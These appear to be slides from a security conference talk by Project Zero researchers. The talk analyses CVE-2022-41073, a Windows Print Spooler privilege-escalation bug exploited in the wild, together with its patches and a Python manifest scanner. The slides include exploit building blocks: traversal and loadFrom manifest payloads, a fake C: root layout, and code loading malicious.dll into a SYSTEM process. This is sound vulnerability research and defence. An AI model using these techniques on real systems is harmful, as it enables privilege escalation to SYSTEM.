OffensiveCon2023.PrintSpooler

Maddie Stone

James Forshaw
OffensiveCon 2023
CVE-2022-41073

https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-41073.html
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41073
Oct 2022 - winspool.drv!LoadNewCopy

    HMODULE LoadNewCopy(LPCWSTR DllPath, DWORD dwFlags) {
        ULONG_PTR ulCookie;
        ActivateActCtx(ACTCTX_EMPTY, &ulCookie);
        HMODULE hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
        // ...
    }

Nov 2022 - winspool.drv!LoadNewCopy

    HMODULE LoadNewCopy(LPCWSTR DllPath, DWORD dwFlags) {
        ULONG_PTR ulCookie;
        ActivateActCtx(ACTCTX_EMPTY, &ulCookie);
        HMODULE hModule;
        HANDLE hToken;
    +   if (RevertToProcess(&hToken)) {
            hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
    +       ResumeImpersonation(hToken);
        }
        // ...
    }
https://bugs.chromium.org/p/project-zero/issues/detail?id=240
[Diagram, two slides: a thread that is impersonating its caller calls LoadLibrary(SharedLibrary.dll). Normally the load resolves to C:\Windows\System32\SharedLibrary.dll. When the impersonated caller has a fake C:\ drive (MyFakeRoot), the same call resolves Windows\System32\SharedLibrary.dll under the fake root instead of the real C:\.]
https://twitter.com/tiraniddo/status/590931788006084609
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│   ├── MyFakeRoot.MANIFEST
│   └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
    ├── System32
    │   └── DriverStore
    │       └── FileRepository
    │           └── prnms003.inf_amd64_454b8d4f31e80f7d
    │               └── Amd64
    │                   └── PrintConfig.dll
    └── WinSxS
        └── Manifests
            ├── amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
            └── amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
What's in a MANIFEST?

DLL Hell (diagram, three slides): Application A installs SharedLibrary.dll (version 2) into C:\Windows\System32. Application B then installs SharedLibrary.dll (version 1) into the same C:\Windows\System32, so both Application A and Application B end up loading version 1.

Side by Side Assemblies (diagram): Application A loads SharedLibrary.dll (version 2) and Application B loads SharedLibrary.dll (version 1), with both versions kept in C:\Windows\WinSxS.
PE Imports: no version information.
Version information, but not detailed.
Application Manifest:

    <assembly>
      <!-- Identity of the "Assembly" -->
      <assemblyIdentity name="App.A" version="1.0.0.0"/>
      <description>My APP A</description>
      <dependency>
        <!-- Dependencies of this Assembly -->
        <dependentAssembly>
          <assemblyIdentity
              name="SharedLibrary"
              version="2.0.0.0" processorArchitecture="*"
              publicKeyToken="6595b64144ccf1df" language="*" />
        </dependentAssembly>
      </dependency>
    </assembly>
Using a Manifest

    // Parse manifest file to an activation context
    ACTCTX config = {};
    config.cbSize = sizeof(config);
    config.lpSource = L"c:\\example.manifest";
    HANDLE actctx = CreateActCtx(&config);

    // Activate and load library
    ULONG_PTR cookie;
    ActivateActCtx(actctx, &cookie);
    HMODULE ret = LoadLibrary(L"SharedLibrary.dll");
    DeactivateActCtx(0, cookie);
    ...
Assembly Searching Sequence (diagram, four slides)

1. Application A's application manifest declares a dependency on SharedLibrary version 2.0.0.0 and asks CSRSS (SXSSRV) to resolve it:

    <assembly>
      ...
      <dependency>
        <dependentAssembly>
          <assemblyIdentity
              name="SharedLibrary"
              version="2.0.0.0" />
        </dependentAssembly>
      </dependency>
    </assembly>

2. SXSSRV looks up the installed version under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide and resolves the reference to version 2.0.1234.0.

3. SXSSRV reads the assembly manifest from C:\Windows\WinSxS\Manifests\amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.manifest:

    <assembly>
      <assemblyIdentity name="SharedLibrary" version="2.0.1234.0"/>
      <file name="SharedLibrary.dll"/>
      ...
    </assembly>

4. The resolved result is handed back to Application A as an activation context.

Assembly Manifest File

    <assembly>
      <assemblyIdentity name="SharedLibrary" version="2.0.1234.0"/>
      <!-- More dependencies -->
      <dependency>
        <dependentAssembly>
          <assemblyIdentity
              name="SharedLibrary.resources" version="2.0.0.0"/>
        </dependentAssembly>
      </dependency>
      <!-- Assembly resources -->
      <file name="SharedLibrary.dll"/>
    </assembly>
Load DLL From Assembly Directory (diagram): with the activation context active, Application A calls LdrLoadDll(...) for SharedLibrary.dll and the loader takes it from the assembly directory C:\Windows\WinSxS\amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.

https://www.microsoft.com/en-us/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits
Exploiting Activation Context Caching (diagram, three slides)

1. A malicious application gets an assembly manifest whose file element carries a loadFrom attribute into the CSRSS (SXSSRV) activation context cache under a key that aliases the real manifest at C:\Windows\WinSxS\Manifests\amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.manifest:

    <!-- Malicious assembly manifest -->
    <assembly>
      ...
      <file loadFrom="c:\evil.dll"
            name="SharedLibrary.dll"/>
    </assembly>

    <!-- Legitimate assembly manifest -->
    <assembly>
      ...
      <file name="SharedLibrary.dll"/>
    </assembly>

2. A victim application whose application manifest depends on SharedLibrary version 2.0.0.0 asks SXSSRV to resolve the dependency, and the cache lookup matches the poisoned entry.

3. The victim receives an activation context built from the malicious manifest and loads evil.dll.

Weak Caching Key

https://bugs.chromium.org/p/project-zero/issues/detail?id=1749
https://www.zerodayinitiative.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation
Parsing the Manifest during DLL Loading

    NTSTATUS BasepProbeForDllManifest(HMODULE DllHandle,
                                      PCWSTR FullDllName,
                                      HANDLE *ActCtx) {
        // Check for an isolation-aware manifest resource in the DLL
        NTSTATUS result = LdrResFindResourceDirectory(DllHandle,
            RT_MANIFEST, ISOLATIONAWARE_MANIFEST_RESOURCE_ID);
        if (NT_SUCCESS(result)) {
            // Create an activation context from that manifest
            ACTCTX config;
            config.lpSource = FullDllName;
            config.lpResourceName = MAKEINTRESOURCE(ISOLATIONAWARE_MANIFEST_RESOURCE_ID);
            config.hModule = DllHandle;
            *ActCtx = CreateActCtxW(&config);
            if (*ActCtx == INVALID_HANDLE_VALUE) {
                return NtCurrentTeb()->LastStatusValue;
            }
        }
        return result;
    }
The Exploit
Does PrintConfig.dll have an Isolation Aware Manifest?

ISOLATIONAWARE DLL manifest

Manifest has dependencies


[Diagram, built up over four slides: exploit.exe (normal user, MEDIUM integrity) has a fake C:\ (MyFakeRoot). printfilterpipelinesvc.exe (SYSTEM integrity), while impersonating the caller, calls LoadLibrary(PrintConfig.dll). That load asks csrss.exe's SXSSRV, which is also impersonating the caller, to resolve the DLL's manifest, and SXSSRV opens Windows\WinSxS through the impersonated drive mapping, so it reads the manifests under the fake root rather than the real C:\Windows\WinSxS.]
Exploit Adds to Common Controls SxS Manifests

    <dependentAssembly>
      <assemblyIdentity
          name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
          version="1.0.0.0"
          processorArchitecture="amd64"
          language="*"
          publicKeyToken="6595b64144ccf1df"
          type="win32" />
    </dependentAssembly>
[Diagram: the same flow one step further. When SXSSRV resolves the added dependency, the traversal in its name leads it out of the fake WinSxS directory to MyFakeRoot\MyFakeRoot.MANIFEST.]
MyFakeRoot.MANIFEST

    <assembly>
      <assemblyIdentity
          name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
          version="1.0.0.0"
          processorArchitecture="amd64"
          publicKeyToken="6595b64144ccf1df"
          type="win32" />
      <!-- Redirect prntvpt.dll -->
      <file name="prntvpt.dll"/>
    </assembly>
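A defender-side check for the two manifest tricks the deck shows, the traversal in the added dependentAssembly name and the loadFrom redirect from the activation-context-cache slides. This is an added Python example, not code from the talk: it scans a manifest string for assembly identity names containing path characters and for file elements carrying loadFrom, run over constructed sample manifests that mirror the deck's snippets.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples for this example. The first mirrors a normal application
# manifest; the second carries the dependentAssembly the exploit adds to the
# common-controls manifests; the third uses the loadFrom redirection from the
# activation-context-cache slides.
BENIGN = r"""<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity name="App.A" version="1.0.0.0" type="win32"/>
  <dependency><dependentAssembly>
    <assemblyIdentity name="SharedLibrary" version="2.0.0.0"
      processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"/>
  </dependentAssembly></dependency>
</assembly>"""

TRAVERSAL = r"""<assembly>
  <assemblyIdentity name="Microsoft.Windows.Common-Controls" version="6.0.19041.1110"/>
  <dependency><dependentAssembly>
    <assemblyIdentity name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot" version="1.0.0.0"
      processorArchitecture="amd64" language="*"
      publicKeyToken="6595b64144ccf1df" type="win32"/>
  </dependentAssembly></dependency>
</assembly>"""

LOADFROM = r"""<assembly>
  <assemblyIdentity name="SharedLibrary" version="2.0.1234.0"/>
  <file loadFrom="c:\evil.dll" name="SharedLibrary.dll"/>
</assembly>"""

# A legitimate assembly identity name never contains path separators or a
# drive colon; any of these lets the name walk out of the WinSxS directory
# when SXSSRV probes for the assembly manifest.
PATH_LIKE = re.compile(r"[\\/:]")


def _local(tag):
    """Strip the XML namespace so namespaced and bare manifests both match."""
    return tag.rsplit("}", 1)[-1]


def scan_manifest(xml_text):
    """Return a list of (kind, detail) findings for one SxS manifest string."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        tag = _local(el.tag)
        if tag == "assemblyIdentity":
            name = el.get("name", "")
            if PATH_LIKE.search(name):
                findings.append(("path-like assembly name", name))
        elif tag == "file" and el.get("loadFrom") is not None:
            # loadFrom points the loader outside the assembly directory, which
            # is exactly what the cache-poisoning manifest relies on.
            findings.append(("loadFrom redirect", el.get("loadFrom")))
    return findings


if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("traversal", TRAVERSAL), ("loadFrom", LOADFROM)):
        print(label, scan_manifest(text) or "clean")
```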
[Diagram: the activation context that csrss.exe's SXSSRV returns to printfilterpipelinesvc.exe for LoadLibrary(PrintConfig.dll) now redirects prntvpt.dll to MyFakeRoot\prntvpt.dll under the fake C:\.]
Modification to prntvpt.dll

    ATL::_dynamic_initializer_for::AtlBaseModule::()

    HMODULE AutoMapNamedElementOnVisit(...) {
        // Turns off impersonation
        SetThreadToken(NULL, NULL);
        // Load final payload DLL.
        return LoadLibraryExW(L"C:\\MyFakeRoot\\malicious.dll",
                              NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
    }
[Diagram: printfilterpipelinesvc.exe (SYSTEM integrity) has loaded PrintConfig.dll, which pulled in the fake prntvpt.dll from MyFakeRoot; that DLL in turn loads MyFakeRoot\malicious.dll, the final payload, inside the SYSTEM process.]
Dec 2022 - sxssrv!BasepSxsCreateFileStreamEx

    DWORD dwAttr = OBJ_CASE_INSENSITIVE;

    // Only true if the process explicitly enabled the mitigation.
  + if (AssemblyManifestRedirectTrust::IsEnabled() &&
  +     ((dwFlags & 0x7000) == 0x7000)) {
  +     dwAttr |= OBJ_IGNORE_IMPERSONATED_DEVICEMAP;
  + }
    OBJECT_ATTRIBUTES ObjectAttributes;
    InitializeObjectAttributes(&ObjectAttributes, &Path, dwAttr, NULL, NULL);

    HANDLE hFile;
    NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, ...);
Dec 2022 - kernel32!BasepCreateActCtx

    DWORD dwFlags = 0;
    if (AssemblyManifestRedirectTrust::IsEnabled()) {
        // Checks for "System" Integrity Level
        if (IsSystemProcess())
            dwFlags |= 0x1000;
        // Is the thread currently impersonating?
        if (NtCurrentTeb()->IsImpersonating)
            dwFlags |= 0x2000;
        // Is mitigation enabled? If so final flags is 0x7000.
        if (((dwFlags & 0x3000) == 0x3000) &&
            KernelBaseAssemblyManifestIgnoreImpersonated) {
            dwFlags |= 0x4000;
        }
    }
    CsrBasepCreateActCtxCommon(dwFlags, ...);
Dec 2022 - kernelbase!SetProcessMitigationPolicy

    // ...
    // Enumerated value 17, this is the SDK name which is clearly wrong!
  + if (MitigationPolicy == ProcessUserPointerAuthPolicy &&
  +     AssemblyManifestRedirectTrust::IsEnabled()) {
  +     BOOLEAN bEnable = *(PDWORD)lpBuffer != 0;
  +     // Sets a global variable.
  +     KernelBaseAssemblyManifestIgnoreImpersonated = bEnable;
  + }
    // ...
Jan 2023 - printfilterpipelinesvc!wWinMain

    // ...
  + DWORD Policy = TRUE;
  + SetProcessMitigationPolicy(ProcessUserPointerAuthPolicy,
  +                            &Policy, sizeof(Policy));
    // ...
CVE-2022-41073 Root Cause

The user can remap the root drive (C:\) for privileged processes
during impersonation.
A design flaw which has been known about since at least 2015.
Variant Analysis

[Diagram: the earlier flow with spoolsv.exe (SYSTEM integrity) drawn over printfilterpipelinesvc.exe as a candidate for the same path: LoadLibrary(PrintConfig.dll) while impersonating the caller, csrss.exe's SXSSRV impersonating in turn, and Windows\WinSxS resolved under the fake C:\ (MyFakeRoot) instead of the real C:\Windows\WinSxS.]
May 2022 – localspl.dll

    void PrintConfigDataHelper::CreateConfigProviderHandle() {
        LPCWSTR lpConfigPath = GetConfigFilePath();
        // Drop the client impersonation around the load, then restore it
        if (lpConfigPath && RevertToPrinterSelf()) {
            hModule = LoadLibrary(lpConfigPath);
            ImpersonatePrinterClient();
        }
        // ...
    }

May 2022 – spoolsv!EnableMitigations

    DWORD Policy = GetSpoolerRedirectionPolicy();
    SetProcessMitigationPolicy(ProcessRedirectionTrustPolicy,
                               &Policy, sizeof(Policy));
    // ...

    // Opt in to the manifest redirection mitigation when the feature is enabled
    if (MSRC70412_PrintManifestRedirectOptIn::IsEnabled()) {
        Policy = TRUE;
        SetProcessMitigationPolicy(ProcessUserPointerAuthPolicy,
                                   &Policy, sizeof(Policy));
    }
    // ...
Find DLL Loads using Process Monitor

    Filter     Option       Match Value             Result
    User       begins with  NT AUTHORITY\           Include
    Path       ends with    .dll                    Include
    Operation  is           CreateFile              Include
    Detail     contains     Impersonating: <USER>   Include
    Detail     excludes     Execute/Traverse        Exclude

Check for the Process Mitigation

A value of 1 indicates the mitigation is set.

Check for Isolation Aware Manifest

The manifest needs to be "IsolationAware" and have at least one dependency.

Debugging SXS Loading

Start SXS trace:

    C:\> sxstrace Trace -logfile:my_trace.log

Parse SXS trace to a text file:

    C:\> sxstrace Parse -logfile:my_trace.log -outfile:my_trace.txt

    INFO: Resolving reference ..\..\..\..\..\..\MyFakeRoot\MyFakeRoot,language="*",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="1.0.0.0".
    INFO: Begin assembly probing.
    INFO: Did not find the assembly in WinSxS.
    INFO: Attempt to probe manifest at C:\WINDOWS\assembly\GAC_64\..\..\..\..\..\..\MyFakeRoot\MyFakeRoot\1.0.0.0_en-US_6595b64144ccf1df\..\..\..\..\..\..\MyFakeRoot\MyFakeRoot.DLL.
DEMO
Final Thoughts
Thank you!

Maddie Stone
James Forshaw
